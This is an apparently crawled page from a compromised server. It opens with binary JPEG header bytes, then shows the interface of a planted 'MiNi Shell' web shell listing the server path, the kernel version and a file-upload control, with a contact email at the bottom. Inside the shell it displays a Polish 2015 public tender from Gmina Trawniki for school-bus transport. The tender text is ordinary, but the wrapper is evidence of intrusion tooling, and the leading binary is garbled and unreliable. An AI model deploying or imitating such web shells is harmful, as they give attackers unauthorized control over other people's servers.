JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150707/100963-N-2015.html

<p class="kh_header"><b>Trawniki: Usługa transportowa przewozu uczniów z terenu gminy Trawniki w roku szkolnym 2015/2016:
1)  do szkół prowadzonych przez gminę Trawniki (zadanie 1),
2) do Ośrodka Szkolno-Wychowawczego w Świdniku ul. Norwida 4 (zadanie 2)</b><br>
<b>Numer ogłoszenia: 100963 - 2015; data zamieszczenia: 07.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Trawniki , Trawniki 605, 21-044 Trawniki, woj. lubelskie, tel. 81 5856018, faks 81 5856018.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.trawniki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa transportowa przewozu uczniów z terenu gminy Trawniki w roku szkolnym 2015/2016:
1)  do szkół prowadzonych przez gminę Trawniki (zadanie 1),
2) do Ośrodka Szkolno-Wychowawczego w Świdniku ul. Norwida 4 (zadanie 2).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa transportowa przewozu uczniów z terenu gminy Trawniki w roku szkolnym 2015/2016:
- do szkół prowadzonych przez gminę Trawniki i ze szkół do miejscowości zamieszkania (zadanie 1);
- do Ośrodka Szkolno-Wychowawczego w Świdniku i z Ośrodka do miejscowości zamieszkania (zadanie 2).
Dowożenie realizowane będzie we wszystkie dni nauki szkolnej określone przez  Ministra Edukacji Narodowej w kalendarzu roku szkolnego 2015/2016 zgodnie z rozporządzeniem Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego (Dz. U. Nr 46 poz. 432 ze zm.). Wyjątek stanowią dni nauki szkolnej ustalone przez dyrektorów szkół jako dni wolne od zajęć dydaktyczno-wychowawczych (na podstawie § 5 powyższego rozporządzenia) lub w szczególnie uzasadnionych przypadkach - jako dni wolne od zajęć dydaktyczno-wychowawczych pod warunkiem zrealizowania zajęć przypadających w te dni w wyznaczone soboty. W tym drugim przypadku dowóz zostanie przesunięty na wyznaczoną sobotę.
3.1  Zadanie 1
Wykonanie zamówienia obejmuje: usługę transportową przewozu około 257 uczniów z terenu gminy Trawniki do szkół prowadzonych przez gminę Trawniki i ze szkół do miejscowości zamieszkania na niżej określonych trasach przewozu.
Trasy przewozu, liczba dowożonych dzieci i organizacja dowożenia
A.  Dowozy do szkół w rozliczeniu tygodniowym (5 dni):
Trasa 1:   Struża Wieś - Biskupice (szkoła) - Struża Kolonia - Biskupice (szkoła) -Trawniki (szkoła)
pięć przywozów tygodniowo - trasa o łącznej długości 15 km
łącznie 75 km tygodniowo, liczba uczniów na trasie - 86, w tym na trasie Struża Wieś - Biskupice (szkoła) - około 42 uczniów i powrót po około 42 uczniów na trasę Struża Kolonia - Biskupice (szkoła); Biskupice - Trawniki 2 uczniów.
Trasa 2:   Oleśniki - Trawniki (szkoła)
pięć przywozów tygodniowo (1 przywóz dziennie długości 7 km),
łącznie 35 km tygodniowo, liczba uczniów na trasie - 34.
Trasa 3:   Ewopole - Dorohucza - Pełczyn - Trawniki (szkoła)
pięć przywozów tygodniowo (1 przywóz dziennie długości 10,5 km)
łącznie 52,5 km tygodniowo, liczba uczniów na trasie - 48.
Trasa 4:  Pełczyn - Siostrzytów (szkoła) - Bonów - Siostrzytów (szkoła) - Pełczyn - Trawniki (szkoła)
pięć przywozów tygodniowo (1 przywóz dziennie długości 14,5 km)
łącznie 72,5 km tygodniowo, liczba uczniów na trasie - 89, w tym na trasie Pełczyn/Bonów-Siostrzytów (szkoła) - 39 uczniów, na pozostałej trasie do Trawnik przewóz 50 uczniów.
Dzienny kilometraż podczas dowozu uczniów do szkół - 47 km. Uczniów dowożonych - ok. 257.   
B. Odwozy ze szkół do miejscowości zamieszkania w rozliczeniu tygodniowym (5 dni):
Trasa 1:   Trawniki (szkoła) - Biskupice (szkoła) - Struża Kolonia - Struża Wieś
siedem odwozów w tygodniu (przez 3 dni - 1 odwóz, przez 2 dni - po 2 odwozy) o długości trasy 12 km, łącznie 84 km tygodniowo, liczba odwożonych uczniów: na trasie Trawniki-Biskupice - 2, na trasie Biskupice - Struża Kolonia - Struża Wieś około 55 uczniów. 
Trasa 2:   Trawniki (szkoła) - Oleśniki - Trawniki (szkoła) - Ewopole - Dorohucza
pięć odwozów tygodniowo (jeden odwóz dziennie o długości 17 km),
łącznie 85 km tygodniowo,
Trasa 3:   Trawniki (szkoła) - Pełczyn - Siostrzytów - Bonów - Siostrzytów (szkoła) - Pełczyn 
pięć odwozów tygodniowo (jeden odwóz dziennie o długości 14,5 km), 
łącznie 72,5 km tygodniowo,
Trasa 4:    Siostrzytów (szkoła) - Pełczyn
trzy odrębne odwozy w tygodniu o długości trasy 3 km, łącznie 9 km tygodniowo.
Trasa 5:  Trawniki (szkoła) - Oleśniki - Trawniki (szkoła)-Ewopole - Dorohucza - Pełczyn - Siostrzytów - Bonów, pięć odwozów tygodniowo (jeden odwóz dziennie o długości 24 km) łącznie 120 km tygodniowo,
Uwaga: w przypadku tras Nr 2, 3 i 5, ze względu na częściowe zdublowanie tras powrotu związane z różnym kończeniem zajęć (po 6, 7 lub 8 h/lekcyjnej) nie sposób jednoznacznie przyporządkować liczby uczniów wracających danym kursem, jednak liczba uczniów na trasie nie przekroczy 55 uczniów.
Dzienny uśredniony kilometraż podczas odwozów - 74 km. 
Dzienny uśredniony kilometraż dowozów i odwozów wynosi 121 km (47 km + 74 km)
Szacowana łączna liczba przewożonych uczniów - 257.
Uwaga: w powyższym kilometrażu dowozów i odwozów nie uwzględniono dojazdu Wykonawcy do przystanków początkowych  oraz  odjazdu Wykonawcy z  przystanków końcowych tras odwozu.
Szczegółowe trasy dowozów i odwozów uczniów do szkół na terenie gminy Trawniki zamieszczone są w załączniku Nr 1 do SIWZ - mapy z trasami dowozów i odwozów.
Organizacja dowożenia do/ze szkół prowadzonych przez gminę Trawniki.
1. Dowożenie uczniów nie może się rozpoczynać wcześniej niż godzinę przed rozpoczęciem zajęć lekcyjnych w poszczególnych szkołach.
2. Odwóz uczniów ze szkół odbywać się będzie w terminach ustalonych bezpośrednio z  dyrektorami szkół, w  których realizowane są dowozy i odwozy.
3. Wymogiem jest, aby kursy przywozów i odwozów uczniów realizowane były minimum dwoma autobusami - każdy autobus o liczbie miejsc minimum 50 miejsc siedzących.
4. Autobusy muszą posiadać zgodne z obowiązującymi przepisami oznakowanie dla przewozu dzieci i młodzieży, sprawną automatykę wszystkich drzwi uruchamianą ze stanowiska kierowcy oraz możliwość blokowania drzwi ze stanowiska kierowcy.
5. Awaria głównego pojazdu dowożącego uczniów uczęszczających do szkół nie zwalnia Wykonawcy z wykonania usługi. W takim przypadku Wykonawca ma obowiązek podstawienia w jak najkrótszym czasie, nie dłuższym jednak niż 60 minut od wystąpienia awarii, pojazdu zastępczego o takim samym standardzie jak autobus główny celem wykonania przewozu.
6. Dyspozycyjność w uzasadnionych przypadkach: odrabianie zajęć w dniu wolnym od pracy w sobotę, przyspieszenie/opóźnienie dowozu/odwozu w związku z wynikłymi uroczystościami szkolnymi.
7. Osoby pełniące funkcję opieki nad uczniami podczas dowozów/odwozów, mają zapewniony bezpłatny przejazd w ramach sprawowanej opieki. Zatrudnienie opiekunów zapewniają szkoły.
3.2  Zadanie 2
Wykonanie zamówienia obejmuje: usługę transportową przewozu ok. 15 uczniów do Ośrodka Szkolno-Wychowawczego w Świdniku ul. Norwida i z Ośrodka do miejscowości zamieszkania na określonej trasie przewozu.
Trasa przewozu oraz liczba dowożonych dzieci.
Trasa przewozu:
Dowóz uczniów: Oleśniki (szkoła) godz. 7.00; Trawniki (szkoła), Dorohucza (szkoła), Siostrzytów, Biskupice (rynek), Struża Kolonia, Struża, Świdnik (Ośrodek Szkolno- Wychowawczy) godz. 7:50. Trasa dowozu długości 40 km. 
Powrót do miejsca zamieszkania uczniów: Świdnik OSW - godz. 15.00, Struża, Struża Kolonia, Biskupice, Siostrzytów, Dorohucza, Trawniki, Oleśniki - 15.50. Trasa powrotna długości 40 km.
Dzienny uśredniony kilometraż podczas dowozów i odwozów - 80 km. Uczniów ok. 15 + opiekun.
Organizacja dowożenia:
Wymogiem jest, by realizowane kursy przywozów i odwozów do Ośrodka Szkolno-Wychowawczego w Świdniku odbywały się autobusem/busem, dostosowanym do przewozu podanej liczby dzieci na trasie, posiadającym zgodne z obowiązującymi przepisami oznakowanie dla przewozu dzieci i młodzieży oraz możliwość blokowania drzwi ze stanowiska kierowcy. Autobus/bus musi być wyposażony w elektroniczne urządzenie pokładowe viaBOX, gdyż część trasy dowozu i odwozu musi być realizowana płatną drogą ekspresową S17. 
Osoba pełniąca funkcję opiekuna podczas dowozów/odwozów, ma zapewniony bezpłatny przejazd w ramach sprawowanej opieki. Zatrudnienie opiekuna zapewnia Gminny Zespół Ekonomiczno-Administracyjny Szkół w Trawnikach..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że posiada licencję uprawniającą do podejmowania i wykonywania działalności gospodarczej w zakresie transportu drogowego (transportu drogowego osób)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy wykonawca wykaże co najmniej 3 usługi dowożenia uczniów do szkół w roku szkolnym o wartości 100 000 zł brutto każda, z okresu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - z tego okresu, które wykonał a w przypadku świadczeń okresowych lub ciągłych, które nadal wykonuje</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że dysponuje co najmniej 5 pojazdami - rok produkcji tych pojazdów co najmniej 1990 r. - dostosowanymi do przewozu odpowiedniej liczby dzieci na poszczególnych trasach opisanych w pkt 3.1 i 3.2 SIWZ, w tym:
- 3 autobusami o liczbie miejsc siedzących minimum 50 na trasy opisane w pkt 3.1 SIWZ,
- 2 autobusami o liczbie miejsc siedzących minimum 15, na trasę opisaną w pkt 3.2 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w zakresie dysponowania osobami zdolnymi do wykonania zamówienia, Zamawiający uzna ten warunek na podstawie oświadczenia złożonego przez Wykonawcę według wzoru - załącznik Nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony:
- jeżeli informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzi, że wykonawca posiada środki finansowe lub zdolność kredytową na kwotę co najmniej 50 000 zł, oraz
- jeżeli wykonawca złoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia potwierdzający ubezpieczenie na kwotę co najmniej 200 000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Za główne dostawy, których dotyczy obowiązek wskazania przez Wykonawcę w wykazie i złożenia dowodów, uznaje się dostawy niezbędne do wykazania spełniania warunku określonego w pkt III.3.2) ogłoszenia;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - wiek środków transportowych (pojazdów) - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić za zgodą obu stron wyrażoną na piśmie. Przesłanką do zmian umowy może być:
- ustawowa zmiana stawki podatku VAT (niezależna od woli stron)
- objęcie dowożeniem uczniów zamieszkałych poza obecnie wyznaczoną trasą dowozu/odwozu skutkujące zwiększeniem liczby kilometrów danej trasy,
- zmniejszenie/zwiększenie liczby odwozów w ciągu tygodnia w związku ze zwiększeniem/zmniejszeniem liczby godzin zajęć.
Wysokość wynagrodzenia należnego wykonawcy ustalana będzie każdorazowo z uwzględnieniem aktualnej stawki podatku VAT obowiązującej na dzień wystawienia faktury</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ugtrawniki.bip.lubelskie.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Trawniki, Trawniki 605, 21-044 Trawniki, pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2015 godzina 10:00, miejsce: Urząd Gminy Trawniki, Trawniki 605, 21-044 Trawniki, pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com